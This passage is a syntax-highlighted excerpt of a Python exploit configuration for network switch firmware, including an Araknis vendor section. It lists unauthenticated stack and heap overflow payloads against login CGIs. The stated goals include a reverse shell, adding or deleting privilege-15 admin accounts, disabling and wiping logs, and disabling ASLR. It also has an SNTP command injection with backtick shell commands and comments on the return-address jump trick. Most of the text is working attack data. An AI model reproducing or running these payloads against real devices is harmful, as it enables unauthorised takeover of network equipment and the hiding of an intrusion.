						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">324</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;pswrd='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">284</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_'</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSntp_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sa=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;sp=123'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSntp_set_check'</span><span class="token punctuation">:</span><span class="token string">'&amp;sa=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/conf_tmp/check`&amp;sp=123'</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSntpDel_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sa=+&amp;sp=123'</span><span class="token punctuation">,</span>				<span class="token comment"># CMD</span>

						<span class="token string">'sys_timeSettings_set_cmd_enable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sn=1'</span><span class="token punctuation">,</span>	<span class="token comment"># Enable CMD</span>
						<span class="token string">'sys_timeSettings_set_cmd_disable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sn=0'</span><span class="token punctuation">,</span>	<span class="token comment"># Disable CMD</span>
						<span class="token string">'sys_timeSettings_set_SIGSEGV'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>		<span class="token comment"># SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/conf_tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token comment">#</span>
					<span class="token comment"># Used for both 'heap' and 'stack'</span>
					<span class="token comment">#</span>
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/security.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/security.cgi?logout'</span><span class="token punctuation">,</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'build=NOP&amp;heap=NOP&amp;to=NOP&amp;higher=addresses&amp;usr=admin&amp;pswrd=_PWDNOP_RA_START&amp;shellcode=_USRNOP_SHELLCODE'</span><span class="token punctuation">,</span>
						<span class="token comment">#'stack':False, # False = use Heap, and there are no ASLR</span>
						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>

				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token string">'Araknis'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> 
				<span class="token string">'vendor'</span><span class="token punctuation">:</span> <span class="token string">'Araknis Networks'</span><span class="token punctuation">,</span>
				<span class="token string">'modulus_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_JSON'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_uri'</span><span class="token punctuation">:</span><span class="token string">'/loginMsg.js'</span><span class="token punctuation">,</span>
				<span class="token string">'xsid'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'xsid_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'login'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Login/Logout on remote device'</span><span class="token punctuation">,</span>
					<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'login'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Login/Logout on remote device'</span><span class="token punctuation">,</span>
					<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
					<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'log'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Disable and clean logs'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'status'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token comment"># Verify lacking authentication</span>
				<span class="token string">'verify'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> 
						<span class="token string">'security.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment"># 'username' also suffer from stack overflow</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/security.cgi?login'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr=admin&amp;pswrd='</span> <span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">280</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'datajson.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment"># 'username' also suffer from stack overflow</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr=admin&amp;pswrd='</span> <span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">288</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/sn_httpupload.cgi?'</span><span class="token punctuation">,</span> <span class="token comment"># Including alignment of opcodes in memory</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">False</span> <span class="token comment"># Boa/Hydra restart/watchdog, False = no restart, True = restart</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'priv15_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Update running-config (PoC: add priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'add_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'del_query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'del_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'SNTP command injection (PoC: disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>	<span class="token comment"># &lt;================================</span>
						<span class="token string">'enable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSettings'</span><span class="token punctuation">,</span>
						<span class="token string">'enable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntpStatus=1&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=sys_timeSettings'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSntp'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;srvDef=byIp&amp;sntpServer=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;cursntpPort=123&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'check_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;srvDef=byIp&amp;sntpServer=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;cursntpPort=123&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSntpDel'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_query'</span><span class="token punctuation">:</span><span class="token string">'{"":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_timeSettings'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntpStatus=0&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span> <span class="token comment"># It is vulnerable, but I am not using this authenticated code here :&gt;</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token comment">#</span>
					<span class="token comment"># The stack overflow in 'username' and 'password' at same request are multipurpose.</span>
					<span class="token comment">#</span>

					<span class="token comment">#</span>
					<span class="token comment"># The trick to jump and execute:</span>
					<span class="token comment"># 1. Code: username=[garbage][RA + 0x58000000]&amp;password=[garbage][NULL termination]</span>
					<span class="token comment"># 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary</span>
					<span class="token comment"># 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)</span>
					<span class="token comment"># 4. We will also feed required function parameters, by adding them to '_CMD_'</span>
					<span class="token comment">#</span>
					<span class="token string">'stack_cgi_add_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: add priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">324</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;pswrd='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">284</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_'</span><span class="token punctuation">,</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_del_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: del priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">324</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;pswrd='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">284</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_'</span><span class="token punctuation">,</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>

						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">324</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;pswrd='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">284</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_ping_post_SIGSEGV'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>		<span class="token comment"># SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>

					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable/Clean logs)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">324</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;pswrd='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">284</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_'</span><span class="token punctuation">,</span>

						<span class="token string">'log_settings_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;en=0'</span><span class="token punctuation">,</span>				<span class="token comment"># Disable Logging CMD</span>
						<span class="token string">'log_settings_set_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>			<span class="token comment"># Disable Logging SIGSEGV ?</span>

						<span class="token string">'log_ramClear_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;ta=0'</span><span class="token punctuation">,</span>					<span class="token comment"># Clean RAM CMD</span>
						<span class="token string">'log_ramClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># Clean RAM SIGSEGV ?</span>

						<span class="token string">'log_fileClear_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;ta=1'</span><span class="token punctuation">,</span>				<span class="token comment"># Clean FILE log CMD</span>
						<span class="token string">'log_fileClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># Clean FILE log SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/datajson.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'usr='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">324</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;pswrd='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">284</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_'</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSntp_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sa=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;sp=123'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSntp_set_check'</span><span class="token punctuation">:</span><span class="token string">'&amp;sa=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/conf_tmp/check`&amp;sp=123'</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSntpDel_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sa=+&amp;sp=123'</span><span class="token punctuation">,</span>				<span class="token comment"># CMD</span>

						<span class="token string">'sys_timeSettings_set_cmd_enable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sn=1'</span><span class="token punctuation">,</span>	<span class="token comment"># Enable CMD</span>
						<span class="token string">'sys_timeSettings_set_cmd_disable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sn=0'</span><span class="token punctuation">,</span>	<span class="token comment"># Disable CMD</span>
						<span class="token string">'sys_timeSettings_set_SIGSEGV'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>		<span class="token comment"># SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/conf_tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token comment">#</span>
					<span class="token comment"># Used for both 'heap' and 'stack'</span>
					<span class="token comment">#</span>
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/security.cgi?login'</span><span class="token punctuation">,</span>
						<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/security.cgi?logout'</span><span class="token punctuation">,</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'build=NOP&amp;heap=NOP&amp;to=NOP&amp;higher=addresses&amp;usr=admin&amp;pswrd=_PWDNOP_RA_START&amp;shellcode=_USRNOP_SHELLCODE'</span><span class="token punctuation">,</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span> <span class="token comment"># False = use Heap, and there are no ASLR</span>
						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>

				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

